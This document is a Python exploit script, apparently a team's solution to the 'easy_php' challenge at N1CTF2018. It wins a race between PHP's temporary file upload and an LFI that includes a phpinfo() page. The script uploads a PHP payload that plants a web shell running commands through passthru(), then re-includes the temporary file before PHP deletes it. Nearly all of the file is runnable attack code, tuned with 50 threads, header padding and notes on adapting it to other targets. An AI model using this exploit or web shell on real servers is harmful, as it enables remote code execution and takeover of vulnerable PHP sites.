PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# Python 2 script (uses the Queue module and print statements). Each worker uploads the
# payload below, reads the temporary upload path out of a phpinfo() page reached through
# the LFI, and re-requests the LFI with that path before PHP removes the temp file.
## passwords.txt payload content: once included it writes /app/intrd, a one-line web shell
## that runs the "f" query parameter through passthru(); the script has no stop condition,
## so end it by hand once that file answers.
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re | |
from subprocess import Popen, PIPE, STDOUT | |
# Size of the worker pool racing the upload window concurrently.
NumOfThreads = 50
# Unbounded FIFO of work items; every item stands for one attempt.
queue = Queue.Queue(maxsize=0)
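class checkHash(threading.Thread):
    """Worker thread that repeatedly races the upload-then-include window.

    The name is historical (the script was adapted from a hash-checking
    skeleton); a queue item is only a trigger for one more attempt and its
    value is never used beyond a check that it is non-empty.

    One attempt:
      1. POST ``passwords.txt`` (the PHP payload from the header comment) as a
         multipart upload to the vulnerable endpoint, with ``action`` pointing
         at a phpinfo() page through the path-traversal LFI.  phpinfo() dumps
         ``$_FILES`` including ``tmp_name``, the path of the temporary copy
         PHP keeps only until the request ends.
      2. Extract ``tmp_name`` from the response and immediately request the
         same endpoint again with ``action`` traversing to that path, so the
         LFI includes (executes) the temp file before PHP deletes it.

    Practitioner notes (review):
      * This is a race.  ``requests.post`` returns only after the whole body
        has arrived, so the window is the time between the server flushing
        the ``tmp_name`` line and the end of that request; the padding below
        is presumably there to inflate the phpinfo response so that line is
        flushed early, and the thread count chosen by the caller multiplies
        the odds.  Expect most attempts to fail.
      * There is no stop condition: the worker keeps racing until the queue
        is drained.  Once the payload has dropped ``/app/intrd`` nothing more
        is gained, so stop the script by hand.
      * ``TMP_NAME_RE`` expects a plain ``=>``.  phpinfo rendered as HTML
        escapes it as ``=&gt;``; if the target serves HTML, adjust the
        pattern (and the HTML-escaped path) accordingly.
      * ``verify=False`` is a no-op for the plain-http target and only
        matters if ``BASE_URL`` is pointed at https.
    """

    # Challenge instance; the docker-local equivalent used during development
    # was http://172.17.0.2:80/index.php.
    BASE_URL = 'http://47.97.221.96:23333/index.php'
    # Path-traversal value that makes index.php include the phpinfo page.
    PHPINFO_ACTION = '../../var/www/phpinfo/index.php'
    # Session cookie as captured for the challenge; replace it for another target.
    PHPSESSID = 'o99quh47clk8br394298tkv5o0'
    # Multipart field name the upload form uses, and the local payload file.
    UPLOAD_FIELD = 'arquivo'
    PAYLOAD_FILE = 'passwords.txt'
    # Filler echoed back by phpinfo() through request headers, a cookie and $_GET.
    PADDING = 'A' * 5000
    # Line of the $_FILES dump that carries the temporary upload path.
    TMP_NAME_RE = re.compile(r"(?<=tmp_name] => ).*")

    def __init__(self, queue):
        """Bind the worker to the shared work queue; ``start()`` is left to the caller."""
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        """Pull items forever; each non-empty item triggers one race attempt.

        Every item is acknowledged with ``task_done()`` even when the attempt
        raises, so one failed request (connection error, no ``tmp_name`` in
        the response) neither kills the worker nor leaves the caller's
        ``queue.join()`` hanging -- the original let an AttributeError from a
        non-matching regex end the thread with its item unacknowledged.
        """
        while True:
            item = self.queue.get()
            try:
                if item != "":
                    self._attempt()
            except Exception as exc:  # worker boundary: report and keep racing
                print("attempt %s failed: %r" % (item, exc))
            finally:
                self.queue.task_done()

    def _attempt(self):
        """Run one upload-then-include cycle and print what the server returned.

        Returns None.  Prints the extracted ``tmp_name``, the include URL and
        the body of the include response; prints a note and returns early when
        the upload response carries no ``tmp_name`` line.
        """
        padding = self.PADDING
        cookies = {
            'PHPSESSID': self.PHPSESSID,
            'othercookie': padding,
        }
        headers = {
            'User-Agent': padding,
            'Pragma': padding,
            'Accept': padding,
            'Accept-Language': padding,
            'DNT': '1',
        }
        upload_url = self.BASE_URL + '?action=' + self.PHPINFO_ACTION + '&a=' + padding
        # Close the payload handle as soon as the request is sent; the original
        # leaked one descriptor per attempt across thousands of attempts.
        with open(self.PAYLOAD_FILE, 'rb') as payload:
            files = {self.UPLOAD_FIELD: payload}
            upload = requests.post(upload_url, headers=headers, cookies=cookies,
                                   files=files, verify=False)
        # Decode explicitly so the str pattern applies on Python 2 and 3 alike.
        body = upload.content.decode('utf-8', 'replace')
        match = self.TMP_NAME_RE.search(body)
        if match is None:
            print("no tmp_name in upload response (upload rejected or phpinfo unreachable?)")
            return
        # Drop a stray CR/LF so the traversal path is exactly the temp file.
        tmp_name = match.group(0).strip()
        print(tmp_name)
        include_url = self.BASE_URL + '?action=../..' + tmp_name
        print(include_url)
        included = requests.get(include_url, verify=False)
        print(included.content)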
# Spawn the worker pool first; daemon threads do not keep the interpreter
# alive once the main thread is done.
for _ in range(NumOfThreads):
    worker = checkHash(queue)
    worker.daemon = True
    worker.start()

# Each work item is just an attempt counter rendered as a string; the workers
# only check that it is non-empty.
for attempt in range(9999):
    queue.put(str(attempt))

# Block until every attempt has been acknowledged with task_done().
queue.join()